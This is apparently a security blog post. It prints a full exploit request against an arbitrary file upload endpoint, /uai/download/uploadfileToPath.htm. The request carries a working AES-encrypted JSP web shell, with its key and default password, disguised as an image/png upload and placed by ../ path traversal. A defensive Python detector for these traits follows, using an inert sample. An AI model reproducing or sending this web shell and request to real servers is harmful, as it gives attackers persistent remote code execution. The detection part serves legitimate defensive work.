This article is for learning and exchange only! Any use for unauthorized penetration, attacks for illegal purposes, or illegal activity has nothing to do with this public account! Readers bear the consequences themselves!

Request packet:

POST /uai/download/uploadfileToPath.htm HTTP/1.1
HOST: xxxxx

-----------------------------570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name='input_localfile'; filename='xxx.jsp'
Content-Type: image/png

<%@page import='java.util.*,javax.crypto.*,javax.crypto.spec.*'%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals('POST')){String k='e45e329feb5d925b';/*This key is the first 16 characters of the 32-character MD5 hash of the connection password; the default connection password is rebeyond*/session.putValue('u',k);Cipher c=Cipher.getInstance('AES');c.init(2,new SecretKeySpec(k.getBytes(),'AES'));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
-----------------------------570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name='uploadpath'

../webapps/notifymsg/devreport/
-----------------------------570xxxxxxxxx6025274xxxxxxxx1--
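From the defender's side, the request above has three features an upload handler or proxy rule can check: a .jsp filename declared as image/png, a destination field containing ../, and a JSP body that pairs defineClass with AES decryption. The Python sketch below is an added example, not part of the original post; the `inspect_upload` and `build_body` helpers, the finding names and both sample bodies are constructed for illustration.

```python
import email
import posixpath
import re

SERVER_EXEC_EXT = {".jsp", ".jspx"}
# Tokens seen in the page's payload: runtime class definition plus AES decryption.
LOADER_TOKENS = (b"defineClass", b"Cipher.getInstance", b"BASE64Decoder")
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

def inspect_upload(boundary, body):
    """Return sorted finding codes for one multipart/form-data request body."""
    header = b"Content-Type: multipart/form-data; boundary=" + boundary.encode()
    msg = email.message_from_bytes(header + b"\r\n\r\n" + body)
    findings = set()
    for part in msg.walk():
        if part.is_multipart():
            continue
        data = part.get_payload(decode=True) or b""
        filename = part.get_filename()
        if filename is None:
            # Plain form field: a client-supplied path must not climb directories.
            if TRAVERSAL.search(data.decode("utf-8", "replace").strip()):
                findings.add("path-traversal-in-field")
            continue
        ext = posixpath.splitext(filename.replace("\\", "/"))[1].lower()
        if ext in SERVER_EXEC_EXT:
            findings.add("server-executable-extension")
            if part.get_content_type().startswith("image/"):
                findings.add("extension-content-type-mismatch")
        if b"<%" in data and sum(t in data for t in LOADER_TOKENS) >= 2:
            findings.add("jsp-classloader-decrypt-pattern")
    return sorted(findings)

def build_body(boundary, filename, ctype, content, path):
    """Build a constructed two-field body using the page's field names."""
    b = boundary
    return (f'--{b}\r\nContent-Disposition: form-data; name="input_localfile"; '
            f'filename="{filename}"\r\nContent-Type: {ctype}\r\n\r\n{content}\r\n'
            f'--{b}\r\nContent-Disposition: form-data; name="uploadpath"\r\n\r\n'
            f'{path}\r\n--{b}--\r\n').encode()

BOUNDARY = "BOUNDARY123"  # constructed value
# Constructed samples: an inert JSP comment standing in for the payload, and a benign upload.
SUSPICIOUS = build_body(BOUNDARY, "xxx.jsp", "image/png",
                        "<%-- inert stub: defineClass Cipher.getInstance --%>",
                        "../webapps/notifymsg/devreport/")
BENIGN = build_body(BOUNDARY, "logo.png", "image/png", "PNGDATA", "devreport")

if __name__ == "__main__":
    print(inspect_upload(BOUNDARY, SUSPICIOUS))
    print(inspect_upload(BOUNDARY, BENIGN))
```

Any one of these findings is enough to reject the upload; the durable fix is for the server to choose the storage directory itself and to store files outside any path the servlet container will execute.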